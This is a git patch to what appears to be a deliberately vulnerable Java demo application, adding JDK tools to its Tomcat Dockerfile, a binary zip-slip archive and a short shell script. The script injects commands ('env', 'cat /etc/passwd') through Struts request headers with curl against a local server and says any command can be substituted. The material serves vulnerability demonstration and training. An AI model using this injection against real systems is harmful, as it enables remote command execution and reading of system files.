From 23633bff1f9b8c58fceb936977f75514761ce0bb Mon Sep 17 00:00:00 2001
From: bmvermeer <brianvermeer@snyk.io>
Date: Wed, 20 Oct 2021 09:52:18 +0200
Subject: [PATCH] added native2ascii to container and made exploits work

---
 Dockerfile                               |   2 ++
 exploits/struts-exploit-docker-tomcat.sh |   4 ++++
 exploits/zipslip-docker-tomcat.zip       | Bin 0 -> 425 bytes
 3 files changed, 6 insertions(+)
 create mode 100755 exploits/struts-exploit-docker-tomcat.sh
 create mode 100644 exploits/zipslip-docker-tomcat.zip

diff --git a/Dockerfile b/Dockerfile
index ab073e6c47..bbc40a06de 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -10,3 +10,5 @@ FROM tomcat:8.5.21
 RUN mkdir /tmp/extracted_files
 COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
 COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.war
+COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
+COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar
\ No newline at end of file
diff --git a/exploits/struts-exploit-docker-tomcat.sh b/exploits/struts-exploit-docker-tomcat.sh
new file mode 100755
index 0000000000..cb2bccf6ff
--- /dev/null
+++ b/exploits/struts-exploit-docker-tomcat.sh
@@ -0,0 +1,4 @@
+# Struts exploit using curl and httpie (more colourful HTTP client)
+# (runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
+cat struts-exploit-headers.txt| sed "s/COMMAND/env/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H
+cat struts-exploit-headers.txt| sed "s/COMMAND/cat \/etc\/passwd/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H
diff --git a/exploits/zipslip-docker-tomcat.zip b/exploits/zipslip-docker-tomcat.zip
new file mode 100644
index 0000000000000000000000000000000000000000..af8621d46b7b23f241a5ac75700b52dde24cdc69
GIT binary patch
literal 425
zcmWIWW@Zs#;Nak3@Ny3cW<UZQKz4e5eu`d6MG5!G6FOlGi(Fd2{P`o&I_XN+q%CLW
zgfIknvvV9y*exRtR0_fYI1Tdw%IfLq6N6Inle1Hcbh8r65_L23b5r%Ric<BHGV}EF
z5=%16QjHRelQT2Deb1c;59s>BANqldmoKp3JAdGZf|74#rGZRfS8>PXO_KrIDFt>F
zBa;XN!js4@26++{z`Pvbjj9XTM38R~z!%6Q#$!M=MENbio0Sb@Iuj6X0Md^^90mY?
CG+dbg

literal 0
HcmV?d00001